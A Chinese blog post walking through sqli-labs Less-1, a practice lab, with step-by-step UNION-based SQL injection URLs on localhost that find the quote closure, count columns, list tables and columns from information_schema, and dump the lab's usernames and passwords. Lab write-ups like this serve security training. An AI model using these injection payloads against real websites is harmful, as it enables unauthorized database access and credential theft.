2021-09-09

最新推荐文章于 2021-12-16 16:13:06 发布
最新推荐文章于 2021-12-16 16:13:06 发布
阅读量111 收藏
点赞数
分类专栏: hack 文章标签: SQL注入 sqli-labs 联合查询 信息探测 数据库安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kangzinian/article/details/120209585
版权

sqli-labs 靶场打靶

basic challenges

less-1

http://localhost/sqli-labs-master/Less-1/?id=1
有信息出现,可以进行联合查询注入

根据标题信息,基于get请求的单引号注入,我们可以判断闭合符号为单引号
http://localhost/sqli-labs-master/Less-1/?id=1‘
出现报错信息,报错如下:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

http://localhost/sqli-labs-master/Less-1/?id=1' order by 2 --+
因为出现两个字段,猜测查询结果集有两个字段的,从2开始
http://localhost/sqli-labs-master/Less-1/?id=1' order by 4 --+ 
报错,所以结果集有三个字段。
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2,3 --+
页面无变化,此时把id改为-1显示后面的查询信息(因为union是合并结果集,当id为正确值的时候,他优先显示原本的查询)
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+
结果显示2,3被打印出来了,2,3的位置可以用于注入

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,database() --+
数据库名就显示出来了,数据库名为:security

http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
通过group_concat将所有的表名都来连接,得到表名有:emails,referers,uagents,users

users为用户列表,接下来去看改表中的字段
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users '--+
得到字段有:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password 

接下来我们去爆破username喝password
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(username,0x3a,password) from users --+
0x代表16进制, 3a是58,在ascii中是 ’:‘,用这个来分割用户名和密码。最后的结果:
Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
圣默
关注
专栏目录
eclipse 2021-09版本汉化--英化
qq_43804919的博客
10-26 1927
汉化 英文汉化为中文 help->install software,选择插入软件。 输入:https://download.eclipse.org/technology/babel/update-site/R0.19.1/2021-09/ 等待一会,选择简体中文,finish就ok! 等待安装,安装后,重启eclipse就ok! ...
vulfocus复现:log4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4804
log4j2远程rce漏洞复现
2021-09-25
热门推荐
weixin_49696047的博客
09-25 2万+
Steam XSX/XBOX one s手柄驱动安装失败解决方法。 方法一:Win+R 输入services.msc ,在右侧列表找到Steam Client Service并设置为自动运行。然后再去steam设置里面自动装驱动。 方法二:Win+R 输入CMD,输入cd C:\Program Files (x86)\Common Files\Steam 回车, 然后再输steamxboxutil64 --install drivers\Windows10\x64 回车,重启电脑。done 撤销:Ctrl
Eclipse 2021-09最新版安装图文教程(详细包会)
qq_53045284的博客
09-16 1万+
考虑到有同学的java课程要求,需要配置java环境和安装Eclipse开发工具,这里写一下Eclipse的安装过程,eclipse安装比较简单,但是还是记录一下吧,Eclipse使用前需要你配置java开发环境。 一、Eclipse下载 1、Eclipse官网下载地址Eclipse Downloads | The Eclipse Foundationhttps://www.eclipse.org/downloads/2、打开网址,会看到如下界面,这里我们点击黄色按钮Download x86_64。
格式化时间 将2021-09-05T09:08:03.000Z 转换成 YYYY-MM-DD HH:mm:ss 格式
m0_58861443的博客
09-05 3843
格式化时间 将2021-09-05T09:08:03.000Z 转换成 YYYY-MM-DD HH:mm:ss 格式 1.引入第三方包 dayjs (一个轻量的处理时间和日期的javascript库) (1)下载 npm install/ i dayjs --save (2). main.js 中全局引入 `import dayjs from 'dayjs Vue.prototype.dayjs=dayjs' 2 时间转换函数 timeTranslate (val) {
2021-09-14
weixin_43869176的博客
09-14 3883
CICFlowMeter工具 报这个错Could not resolve all files for configuration ‘:compileClasspath’. 修改build.gradle文件中的
2021-09-22
weixin_46482214的博客
09-22 4596
Centos7扫描漏洞及离线处理方法漏洞处理方法nginx 安 全 漏 洞 (CVE-2021-23017)下载需要安装的离线包pcre安装openssl安装zlib安装nginx升级安装上述完成以后,会在当前我解压缩nginx的objs下面产生一个nginx二进制文件Apache Druid未授权访问【 原理扫 描 】处理方法OpenSSH CBC模式信息泄露漏洞(CVE-2008-5161)【 原理扫 描 】ICMP timestamp请求响应漏洞允许Traceroute探测SSH版本信息可被获取探测到
eclipse-2021-09安装lombok插件
zzy7075的专栏
09-27 1243
新开发环境,就下载了一个版本的eclipse2021-06。 按lombok官网说明安装了eclipse的插件: 插件地址:https://projectlombok.org/p2 安装完重启eclipse后,文件打不开,提示: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int) throws java.lang.C.
2021-09-12
qq_41118052的博客
09-12 2252
有一张表有3个字段 UID(用户ID), Date(日期), Site(网站),有最近1年的多个网站的访问记录。 求:按每个网站,每天输出以下指标 新增用户数量 当日用户数 最近3天去重用户数 说明:网站新增用户,即此用户第一次访问该网站。 建表: create table log(site varchar(10),uid varchar(10),log_date date); insert into log values('A' , '01' , '2021-06-01'); insert into
eclipse jee 2021-09 旧版本java web项目tomcat报404错误
weixin_47491231的博客
12-16 794
不知道为啥,项目库也改了 2021-06版本没有这个问题,一切正常
eclipse-java-2021-09-R-win32-x86_64.zip
10-25
这个版本“eclipse-java-2021-09-R-win32-x86_64.zip”是2021年9月发布的一个更新版,针对Windows x86_64架构进行了优化,这意味着它可以在64位的Windows操作系统上运行,充分利用多核处理器和大内存的优势。...
eclipse-jee-2021-09-R-linux-gtk-aarch64.tar.gz
10-25
Eclipse IDE for Enterprise Java and Web Developers (eclipse-jee-2021-09-R-linux-gtk-aarch64.tar.gz)适用于Linux AArch64
Remake_save_2021-09-16T15.43 05.284Z.json
09-16
本人玩的修仙存档,固定天赋小盒子,重开129次,成就87个,事件50%,天赋75%。休闲次数大概7次,最多一次500岁,但是没渡劫。
eclipse-java-2021-09-R-linux-gtk-x86_64.tar.gz
10-25
本篇将详细解析"Eclipse IDE for Java Developers",即2021年9月发布的版本,具体文件为“eclipse-java-2021-09-R-linux-gtk-x86_64.tar.gz”,针对Linux x86_64架构的系统。 首先,Eclipse Java版是专为Java开发者...
eclipse-jee-2021-12-R-win32-x86_64.zip
01-05
Eclipse IDE for Enterprise Java and Web Developers (eclipse-jee-2021-12-R-win32-x86_64.zip)适用于Windwos x86_64
十大应用安全威胁
kangzinian的博客
12-17 2874
常见应用安全威胁(OWASP TOP 10) 2013 注入 失效的身份认证和会话管理 跨站脚本攻击(XSS) 不安全的直接对象引用 安全配置错误 敏感信息泄露 功能级访问控制缺失 跨站请求伪造(CSRF) 使用含有已知漏洞的组件 未验证的重定向和转发 风险评估标准 风险 = 可能性 * 影响 颜色越深,说明越容易发生,影响越大 注入 SQL注...
MS03-026
kangzinian的博客
09-16 2285
靶场简介 Windows系统漏洞靶场1 靶场知识点 信息获取,缓冲区溢出,Metasploit攻击 靶场描述 靶场知识点 漏洞名称:MS03-026 漏洞介绍:Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞。 此漏洞最初由lsd-pl.net漏洞研究组在2003年7月16日发现的。这个漏洞被披露以后,随着exploit程序的公开,网上迅速出现了大量的exploit攻击实例,随后利用者个漏洞的蠕虫程序也大量出现,带来了巨大的危害。可以说这是个非常严重的漏洞,影响客户非常广泛
安装kali出现中文乱码的解决办法
kangzinian的博客
01-15 2073
众所周知,很多东西对中文都是相当的不友好,当咱们中国的小伙伴安装了Kali虚拟机选择中文的时候 就出现了难以忍受的乱码,这个十分令人头疼。 可以看到 中文字符都变成了方块乱码。 别急 我在整理了网上很多资料后,解决了这个问题 下面就给小伙伴们看一看 记不住的 可以收藏的哦 输入locale -a 查看是否有en_US.UTF-8和zh_CN.UTF-8, 在命令行输入dpkg-reco...
谷歌常见语法解析
kangzinian的博客
04-12 901
搜素引擎实际上就是一个爬取url的爬虫 搜素引擎就是帮助我们获取信息 对方的个人资料 公司信息 学校简介 数据文件 … 谷歌语法: 关键字 功能 “” 双引号内的内容不可拆分 site 指定域名 inurl url存在关键字的网页 intext 网页正文中的关键字 filetype 指定文件类型 intitle 网页标题中的关键字 link Link:z...
使用python中的pymsql完成如下:表结构与数据创建 1. 建立 `users` 表和 `orders` 表。 `users` 表有用户ID、用户名、年龄字段,(id,name,age) `orders` 表有订单ID、订单日期、订单金额,用户id字段。(id,order_date,amount,user_id) 2 两表的id作为主键,`orders` 表用户id为users的外键 3 插入数据 `users` (1, '张三', 18), (2, '李四', 20), (3, '王五', 22), (4, '赵六', 25), (5, '钱七', 28); `orders` (1, '2021-09-01', 500, 1), (2, '2021-09-02', 1000, 2), (3, '2021-09-03', 600, 3), (4, '2021-09-04', 800, 4), (5, '2021-09-05', 1500, 5), (6, '2021-09-06', 1200, 3), (7, '2021-09-07', 2000, 1), (8, '2021-09-08', 300, 2), (9, '2021-09-09', 700, 5), (10, '2021-09-10', 900, 4); 查询语句 1. 查询订单总金额 2. 查询所有用户的平均年龄,并将结果四舍五入保留两位小数。 3. 查询订单总数最多的用户的姓名和订单总数。 4. 查询所有不重复的年龄。 5. 查询订单日期在2021年9月1日至9月4日之间的订单总金额。 6. 查询年龄不大于25岁的用户的订单数量,并按照降序排序。 7. 查询订单总金额排名前3的用户的姓名和订单总金额。 8. 查询订单总金额最大的用户的姓名和订单总金额。 9. 查询订单总金额最小的用户的姓名和订单总金额。 10. 查询所有名字中含有“李”的用户,按照名字升序排序。 11. 查询所有年龄大于20岁的用户,按照年龄降序排序,并只显示前5条记录。 12. 查询每个用户的订单数量和订单总金额,并按照总金额降序排序。
最新发布
06-03
cur.execute('SELECT SUM(amount) FROM orders WHERE order_date BETWEEN "2021-09-01" AND "2021-09-04"') print(cur.fetchone()[0]) # 6. 查询年龄不大于25岁的用户的订单数量,并按照降序排序。 cur.execute('''...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值